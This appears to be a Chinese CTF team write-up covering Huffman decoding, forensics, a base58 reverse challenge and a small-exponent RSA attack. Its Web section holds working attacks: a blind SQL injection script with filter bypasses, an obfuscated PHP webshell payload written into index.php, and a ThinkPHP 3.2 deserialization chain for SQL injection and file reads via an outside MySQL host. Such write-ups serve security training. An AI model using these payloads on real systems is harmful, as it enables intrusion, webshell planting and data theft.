第16名，师傅们tql！

Misc

签到

安全知识问答

歪比歪比

流量包追踪TCP流

发现是哈夫曼树

# -*- coding: utf-8 -*-
# python3

# 统计字符出现频率，生成映射表
def count_freq(text):
    chars = []
    chars_freqs = []
    for i in range(0, len(text)):
        if text[i] in chars:
            pass
        else:
            chars.append(text[i])
            char_freq = (text[i], text.count(text[i]))
            chars_freqs.append(char_freq)
    return chars_freqs


# 节点类
class Node:
    def __init__(self, freq):
        self.left = None
        self.right = None
        self.father = None
        self.freq = freq

    def isLeft(self):
        return self.father.left == self


# 创建叶子节点
def createNodes(freqs):
    return [Node(freq) for freq in freqs]


# 创建Huffman树
def createHuffmanTree(nodes):
    queue = nodes[:]
    while len(queue) > 1:
        queue.sort(key=lambda item: item.freq)
        node_left = queue.pop(0)
        node_right = queue.pop(0)
        node_father = Node(node_left.freq + node_right.freq)
        node_father.left = node_left
        node_father.right = node_right
        node_left.father = node_father
        node_right.father = node_father
        queue.append(node_father)
    queue[0].father = None
    return queue[0]


# Huffman编码
def huffmanEncoding(nodes, root):
    codes = [''] * len(nodes)
    for i in range(len(nodes)):
        node_tmp = nodes[i]
        while node_tmp != root:
            if node_tmp.isLeft():
                codes[i] = '0' + codes[i]
            else:
                codes[i] = '1' + codes[i]
            node_tmp = node_tmp.father
    return codes


# 编码整个字符串
def encodeStr(text, chars_freqs, codes):
    huffmanStr = ''
    for char in text:
        i = 0
        for item in chars_freqs:
            if char == item[0]:
                huffmanStr += codes[i]
            i += 1
    return huffmanStr


# 解码整个字符串
def decodeStr(huffmanStr, chars_freqs, codes):
    orignStr = ''
    while huffmanStr != '':
        i = 0
        for item in codes:
            if item in huffmanStr:
                if huffmanStr.index(item) == 0:
                    orignStr += chars_freqs[i][0]
                    huffmanStr = huffmanStr[len(item):]
            i += 1
    return orignStr


if __name__ == '__main__':

    trash_array = {
    'j': 29,
    'z': 31,
    '7': 25,
    'e': 31,
    'l': 23,
    '6': 37,
    '4': 32,
    'p': 38,
    'h': 27,
    'g': 26,
    'x': 28,
    'i': 25,
    'u': 27,
    'n': 25,
    '8': 36,
    '0': 24,
    'o': 23,
    'c': 28,
    'y': 24,
    '1': 29,
    'b': 26,
    'm': 27,
    '2': 28,
    'v': 25,
    'd': 33,
    'f': 28,
    '9': 33,
    't': 21,
    'w': 22,
    'a': 31,
    'r': 24,
    's': 16,
    'k': 32,
    '5': 25,
    'q': 23,
    '3': 32,
    '{': 1,
    '-': 4,
    '}': 1,
    }
    tt = list(trash_array.items())
    chars_freqs = tt

    nodes = createNodes([item[1] for item in chars_freqs])
    root = createHuffmanTree(nodes)
    codes = huffmanEncoding(nodes, root)

    huffmanStr = '0111110001000011001010001111011110101010011011011110100000110010111101000010010010001100001110010000011110011101101111011001111101000000111010100000101101001000111100000000010100110100101001011101110010001100011100010010111001100011100110011010011000101010100011011110001111111110111001011100010100101111100001011011001001001000010111110101110111010111100010111011000011001011001101001010010111111001110101000110001001001100101110111101111000110010010111111000111110000101001100100100001001110100101011111101111110011101011101000000100100100011111111001000101110101001001101110001011101101001001001011010000101111111001011111100110010100111111110001001100100010010010011110111110110110001101000010010110110001011010000100011010111110101110000110000010001111111110000101000100101101111000111100101101011001100010101011000110010011111001010011110100100011000101111110111011011000011011010100011011100010001010001010000000001101001010010100111111010010110110011110100101010010101001010100010101011010011110001000011000100001010111001110001100101100001010111011110110111110000001011011111011101101000111111110100111100110011101111100111100101101101101010100110001100100110101011110000011111111100011110011101010011110101010111100111100001000111110111110100010011110011000010000100001100101111101010110101100011100010010100001110001001010110010010010100010101101101001110000101111110101010110110110000010011000111000010001001101101101101100111000011000011010101111010101100101000011011001011000101101110100011110001100111101111011000100110110000111010101101111101001111111111100001000111000001001011111011110010110101011110001110001101010011000101111100001111111011100110101001000011111101111111011001111110001110111110110010111000111011011110010101010110011001110110011110001111010000011010101000111110111011100101100100100100001111101010011101111100110011100000010100101000111100100011001011111000000111111111000000011111111101110111111001110100100000100000011011111010000000011110101110111101101011001111011010101111000010110001101000111000111000001110110111000100011110101100100100011100111100101101010010110101011111110011100100000111011011010101101110111000001001100110111001000111001000000111000110010110000100100010001001111010101000101101111000000110101110011101001011100110111101101111100001111000110001101010000111100100011110001100110111001101011100010101011110111111111100101100101010001101110101101101010101001110100001101011000100001111011011100101011000001001000011011000111011101110011001101110100000010100000101111010000001000011001101101111010011101000000101101101011101001101110000010011110001110100111000101111101010110111010011010011000011000110110010110001001000101101111000010010001011110100010111010100101100101111010100001110111100000100101101011110010110001000111111001000000101110010111010001101101111101110111000010101100100001010101001010010001011101001100101010101001111110000010011010011110101001001001110010110100111011110110000111101000010011111000111111001111010011101011010011100010001111101001110011110101111111111111011010100000010100010010011110100110011011101011101011101100000100111110111100100000101011000110110000010110001001111111111011101011000010101111110111001011101111111100111011101001000111011110110111101001011110011000110011000010011011001001100010010111110000110100001110111100110110100101010010111001001100101111010010001001111111000010111101010110000001110101000111011010111100110101001001110001110001001111110001000010011011110100111011111000101111110011000011010001000101000110011100011001001011000111011100101101000110001110011011101010101001010011101110100100111101011101010011010101010111101110101101000001111100111111010011010111101000101011111101011100101101101001100011001111101111100100111101101101110111111010111010100100101110111000011100001001000011100010101110100111110011001100101111110110100111101000010001000011011110000011010110111010110001110011111110000011110010001011010010111111101010101110010000001010011111011100101000101101010101101101000101000110011101101010110001100101011101110111100000001010000011110011010011000011111110100111011100100111000001101001110111100000101010110000010000100001110111000011111110010010100111111101010110000000000111011010000101100100111001110000001011101100000110110101011001011000111001111110010101111001011011101000010001100011101110010100111000011111001110001100111110110111101010101011001000101011010001100000010001111110011001101111111010110010001111001100111110001110011100010011011100100010011011000110000100101111100111110111101010010001101010011100110001011001111000100011011110100011101011101010111111110000011110110111011110000010111100110011100011010111101111110100000010001111100101100011110001101011111101111111011111011101010001101001000111000101111110101000110011000111011111101111110100001111011110010100011101110111111010101100111000101100100010011101001011110011111001111101110001110111111011100111100010110010011011010100011100101010101010110000001010111001101111100111110010100111000010101111001110011011011111001101110011111001000000000111101011000111110001101010011011000010100100100111011111110010000000101001111111110101100001010000001110100101001111001011011001001001011100101111110'
    orignStr = decodeStr(huffmanStr, chars_freqs, codes)

    print('Decode result:' + orignStr)

InputMonitor

取证题

取证大师一把梭

看输入法自定义词汇

说了是六个字的解压密码，去找六个字的词

解压密码是有志者事竟成

解压flag.7z

编辑pdf，把这个图去掉就有flag了

Reverse

g0

大体逻辑通过 main_Encode 对输入进行加密，正确的话会执行自解密的一段代码，输出flag

动态调试直接找自解密代码，发现是 base58 换了字母表，在 main_main_func1 中找到密文解密得到flag

#coding=utf8
import string
import base58
from Crypto.Cipher import ARC4
STANDARD_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
CUSTOM_ALPHABET = "12Nrst6CDquvG7BefghJKLMEFHPQZabRSTUVmyzno89ApwxWXYcdkij345"
ENCODE_TRANS = string.maketrans(STANDARD_ALPHABET,CUSTOM_ALPHABET)
DECODE_TRANS = string.maketrans(CUSTOM_ALPHABET,STANDARD_ALPHABET)
def decode(input):
 return base58.b58decode(input.translate(DECODE_TRANS))

key = "2GVdudkYo2CBXoQii7gfpkjTc4gT"
flag = decode(key)
print flag


# flag{We1c0m3_CTF245}

Crypto

RSA ATTACK

import gmpy2,binascii,libnum,time
n=28592245028568852124815768977111125874262599260058745599820769758676575163359612268623240652811172009403854869932602124987089815595007954065785558682294503755479266935877152343298248656222514238984548734114192436817346633473367019138600818158715715935132231386478333980631609437639665255977026081124468935510279104246449817606049991764744352123119281766258347177186790624246492739368005511017524914036614317783472537220720739454744527197507751921840839876863945184171493740832516867733853656800209669179467244407710022070593053034488226101034106881990117738617496520445046561073310892360430531295027470929927226907793
e=3
res=0
c=15839981826831548396886036749682663273035548220969819480071392201237477433920362840542848967952612687163860026284987497137578272157113399130705412843449686711908583139117413
print time.asctime()
for i in xrange(200000000):
    if gmpy2.iroot(c+n*i,3)[1]==1:
        res=gmpy2.iroot(c+n*i,3)[0]
        print i,res
        print libnum.n2s(res)
        print time.asctime()
        break
'''
Fri Apr  2 20:17:15 2021
0 2511413510842166080065277487935235573010338102447558587517
flag{w0_x1hu1n_y0u_b5st}
Fri Apr  2 20:17:15 2021
'''

Web

happysql

过滤列表如下

用case代替if，lpad代替substr，/**/代替空格，regexp代替等号

import requests
import string
import binascii

result = ''

url = "http://eci-2zehajx15wscjh7jgx4v.cloudeci1.ichunqiu.com/login.php"
payload = 'username=admin1"/**/||case/**/when/**/(lpad(((select/**/group_concat(a.1)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/f1ag)/**/as/**/a)),{}))/**/regexp/**/{}/**/then/**/1/**/else/**/0/**/end%23&password=1'
headers = {
'Content-Type':'application/x-www-form-urlencoded'
}

for k in range(1,50):
    print(k)
    for i in string.printable:
        if i in '*+.?|$':
            continue
        data = payload.format(str(k),'0x' + binascii.b2a_hex((result + i).encode()).decode())
        web = requests.post(url,data,headers=headers)
        #print(data)
        if 'home' in web.text:
            result += i
            print(result)
            break

write_shell

利用短标签和或运算绕过过滤

先获取目录

把payload写入index.php

http://eci-2ze8pd94714j0yxw427u.cloudeci1.ichunqiu.com/?action=upload&data=<?=("%00%00%08%01%02%10%00%00%02%00%00%00%00%01%00%00%00"|"%66%69%64%64%5d%60%75%74%5d%63%6f%6e%74%64%6e%74%73")("%00%02%01%00%00%00%00%00%00%08%00%00%08%00%00%01%00%00%00%00%00%00%00%01%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00%00%00%00%00%00%01%01%00%00%00%01%00%00%00%10%08%10"|"%2f%74%60%72%2f%77%77%77%2f%60%74%6d%64%2f%73%60%6e%64%62%6f%78%2f%34%64%35%62%30%39%62%32%31%34%39%66%37%36%31%39%63%63%60%31%35%35%63%38%62%64%36%64%38%64%64%35%2f%72%60%79%69%2e%60%60%60","%00%00%00%01%02%01%08%00%00%02%00%00%00%00%00%01%00%00%01%00%00"|"%3c%3f%3d%64%74%60%64%28%24%5d%50%4f%53%54%5b%60%5d%29%3a%3f%3e")?>

访问http://eci-2ze8pd94714j0yxw427u.cloudeci1.ichunqiu.com/sandbox/4e5b09b2149f7619cca155c8bd6d8ee5/

添加蚁剑

easytp

ThinkPHP v3.2.* （SQL注入&文件读取）反序列化POP链

poc

<?php
namespace ThinkDbDriver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "thinkphp3",
            "hostname" => "47.101.57.72",
            "hostport" => "2333",
            "charset"  => "utf8",
            "username" => "root",
            "password" => ""
        );
    }
}

namespace ThinkImageDriver{
    use ThinkSessionDriverMemcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace ThinkSessionDriver{
    use ThinkModel;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use ThinkDbDriverMysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new ThinkImageDriverImagick()));
}

按照文章中说的，尝试读配置文件，发现里面没有账号密码

读取/start.sh

发现flag写入了数据库

这里数据库口令为root/root

试了不行，换成123456就成了，弱口令yyds

因为不知道flag在哪个数据库，只能挨个数据库查

<?php
namespace ThinkDbDriver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}

namespace ThinkImageDriver{
    use ThinkSessionDriverMemcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace ThinkSessionDriver{
    use ThinkModel;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use ThinkDbDriverMysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new ThinkImageDriverImagick()));
}

最后查到数据库名为tp，表名为f14g

利用子查询进行无列明查询

<?php
namespace ThinkDbDriver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}

namespace ThinkImageDriver{
    use ThinkSessionDriverMemcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace ThinkSessionDriver{
    use ThinkModel;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use ThinkDbDriverMysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,concat(0x7e,substr((select group_concat(a.1) from (select 1 union select * from tp.f14g) as a),1,30)),1)#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new ThinkImageDriverImagick()));
}

用substr绕过长度限制，爆出flag